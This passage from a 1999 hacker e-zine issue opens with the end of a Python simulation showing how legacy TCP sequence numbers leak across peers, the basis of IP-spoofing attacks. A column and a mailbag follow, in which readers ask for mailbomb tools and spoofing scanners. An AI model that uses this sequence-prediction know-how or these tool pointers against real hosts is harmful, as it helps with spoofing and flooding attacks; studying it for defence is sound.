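    y = HostY("192.0.2.10", 513, policy)                   # constructed
    seen = y.on_syn("192.0.2.99", 40000, 1)["seq"]         # one peer
    other = y.on_syn("192.0.2.50", 1022, 1)["seq"]         # another, same tick
    return (other - seen) % MOD == CONN_JUMP


if __name__ == "__main__":
    print(f"clock wrap: {wrap_period_hours():.2f} h")
    for policy in (legacy_isn, rfc1948_isn):
        print(policy.__name__, "leaks across peers:",
              isn_leaks_across_peers(policy))
```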
Resources

Request For Comments: 793, 1825, 1948
IP-spoofing Demystified - Trust-Relationship Exploitation by daemon9 / route / infinity
  http://www.phrack.com
SYN Floods: The Cause and Cure by NeonSurge
  http://www.rhino9.org
Introduction to the Internet Protocols by The Computer Science Facilities Group
  http://homepages.iol.ie/~cronus/ip/info70.txt

::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 8 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Ask Dr. Klep - "Kleptic's Views": kleptic@grex.org

Well, this text is just about what I've been thinking about lately. I've been thinking about many topics, some important, some not... like "Why do you press harder on your remote control for your TV when you know the batteries are dead?" or "What would a chair look like if your legs bent the other way!?" and the most important, "If a tree fell in the woods and no one was around to see it, would the other trees make fun of it!?" Those are the not so important things I've been thinking about.

You know what really pisses me off? All that Bill Clinton and Monica shit. I'm really tired of hearing about that, and I'm sure all of you are too. First of all, I don't want him impeached, but I do think he's a jackass. Hey, would you want Al Gore as president of the USA? I know I wouldn't.

Yeah, see, I don't think like most 'computer analysts' or "hackers"; most hackers/phreaks/crackers/warez d00dz are mostly "anarchists". I believe in order in a country; if there wasn't any order people would cause havoc all the time, and people would die. And I'm sure no one REALLY wants to die.

And how come older people or adults think that teenagers, or people in the age range of 14-21, are nothing but a bunch of rowdy misfits!? And that we all have nothing to do but do drugs and have sex? That's not all true, in fact. Not all kids do drugs or have sex.
Yeah, see, I live a lifestyle that most of you have probably heard about. It's called "Straight Edge". Straight Edge means a drug-free lifestyle: "don't drink and don't smoke", those are the rules of today... back in the 1980's the rules were "Don't Drink, Don't Smoke, Don't Fuck". The term "Straight Edge" was coined by Ian MacKaye, the singer from a 1980's hardcore/punk band called "Minor Threat". But I'm not gonna get into the history, I'm just trying to make a point.

This text is kinda short, and most of you probably don't give a rat's ass about what I'm thinking about, but I'm just trying to make a point. This is the way I feel, and I personally don't give a shit if you think otherwise.

For the next instalment of "Ask Dr. Klep" I will need all of you to e-mail me questions or comments on anything in this text, or any other texts that I've written before, or any technical questions. I will answer them in the next issue of the DoJ.

Thank You,
Kleptic
kleptic@grex.org
http://wwz.net/kleptic/

::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 9 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:The Viewing Public:

This is our mailbag. Our dirty electronic linen. Basically a dumping ground for mail we get about the DoJ, but occasionally we will throw in a snippet that we consider humorous, scary or just plain disturbing... Cronus recently had an article printed in the print publication Blacklisted 411 and received many mails on the topic; they are answered here.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

From: Core
Subject: Co-operation

I was just checking out your page and was wondering whether or not you would like to co-operate with me in attempting to bring about a total boycott of Tinet in order to get them to bring down the phone charges? Mail me here if you think we can work something out.
Freeman

:It's worth noting that Tinet is Telecom Internet, an ISP run by the main telephone company here in Ireland. And unfortunately boycotting them will not by any means reduce phone charges. In fact, since my site is a hacking site, whatever you had in mind is most likely illegal and I amn't interested, but thanks for the thought.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

From: portcharlottesux@hotmail.com
Subject: Mailbombs

Where can I download some decent chat bombs, mail bombs, IM bombs, ICQ bombs, or any other proggies? I would be greatly appreciative. E-mail me at portcharlottesux@hotmail.com

:My oh my, you seem to have a bit of an unhealthy obsession on your hands there. Well, now that you've given out your email address in these hallowed pages I'm sure somebody will 'help' you with your request. For the ICQ bomb you'll have to send us your UIN, hehe..

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

From: "jastel marrell"
Subject: EUA

Greetings and Salutations Cronus,

Just got done reading your article in the latest edition of Blacklisted 411. Good info. Was wondering if you would be interested in doing similar articles for the Electronic Underground Affiliations E-Zine? The EUA is made up of various hacker orgs around the world and we like to put out a monthly zine to keep our members informed of what's going on and what's new in the hacker/phreak underground. You can find us on the web @ "http://members.xoom.com/xxxxxxxx/". We've kept a low key for the past few for a couple of reasons, namely the events revolving around Kevin M. and Justin P. But alas, that has come about in a manner most unwanted. Drop me a line and let me know if you are up for writing a few articles for us.

Thanks
archive

:Hi archive, I responded personally and just wanted to comment on your mail for our readership. I understand that you didn't realise that I am editor of this Zine, but may I presume to ask a few questions?
Why would a European E-Zine be worried about the prosecution of US hackers? And why would a publication choose for any reason to keep a low profile? Why publish anything if you have to keep it low profile? I censored your URL as you seemed very worried about staying low profile.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

From: Cigarjosey@aol.com
Subject: better reception

dear cronus I am a farmer and i love your articles in 411.i have an ericson kh668 and i wanted to hook up a external antenaa to my 80 foot silo. Radio shack has a filter for the phones frequencies but they dont have the tnc connecter. Ericsdonn wants a arm and a leg for their travel hook up. Can u help? thanks cigarjosey

:Cigarjosey, if that is your REAL name. I am not sure I know what you are asking. Perhaps if you asked a question like 'Can you get me this thing?' or 'Where should I go to buy it?'. Until you phrase your mails according to the dictates of Modern English I will have to simply ignore you.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

From: "Ben Winston"
Subject: I'm not so sure I wanna Help You Discordants

Very, very cool site.

:Hmm, yes. Nice and to the point.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

From: "DynamikHack"
Subject: Wingating the Net

I read your article about using IP spoofing through Wingate systems. At the end of it, it said that files such as an IP scanner are available on your site. However, I can't seem to find them. Can you provide me with a link to somewhere that I can get an IP scanner? thanks

:Try www.warforge.com

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

From: "Kirby L. Wallace"
Subject: oh yeah, one other thing...

It's nice to find others who are interested in learning for the sake of learning, not for the sake of playing one-upmanship with destructive behaviours that only prove what a moron one is. Good for you.

Kirby

:Thanks for the support Kirb.
You will not be forgotten when the revolution comes...

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

That's about it for this issue. But keep those ridiculous questions coming, 'cause the next issue will award a special prize to the most stupid mail we receive.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 10:::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Conclusion:

Well there you all are for another issue. Hope it keeps you as enthralled as previously. We try to keep up the usual degree of crap each issue. We are sure you lot have complaints, so send them to discordia@Rue-the-Day.net and we'll probably ignore you.

We have some complaints of our own. We started this Zine out of boredom and it seems that no-one is interested. Sure, we get loads of hits on the site. Loads of people download the Zine, but apart from abuse, rarely do we get a serious contributor. We need, I repeat WE NEED, submissions of stories, how-to's, art, poems, quotes, technical FAQs, hacking texts, underground exploits and anything else you have lying around. Unlike the swanky print publications that you actually have to PAY for... the DoJ is free and we need your help to keep it up. Cronus and Rue do not intend to write anything for the next issue. We want your help in filling the space.

Much thanks go out to Kleptic and Digital Avatar for both their continued support. Thank You Guys. Ethercat has always been willing to help and much thanks go out to her for putting up with all our wild ideas... rOTTEN was the original ASCII artist and for this issue we decided we needed a change. The new art is done by an anonymous author, but thanks go out to carsten_bund@mediacube.de. Also we recently got our first contribution of Digital Art to the Gallery section of the site; thanks go out to Michael Perryman.

Kleptic has his now regular column 'Ask Dr.
Klep' and we thought the name would be enough to inspire questions, but obviously not. Kleptic, Klep to his friends, is a very well rounded underground figure and is willing to answer all your questions, even the ones your parents would never answer growing up. So mail him your deep underground questions and he'll sort you with an answer...

So till next time Folks. Same Discordant Time, Same Discordant Channel.

'Be Safe, don't get caught with your pants down...' - President William Clinton.

The Editors.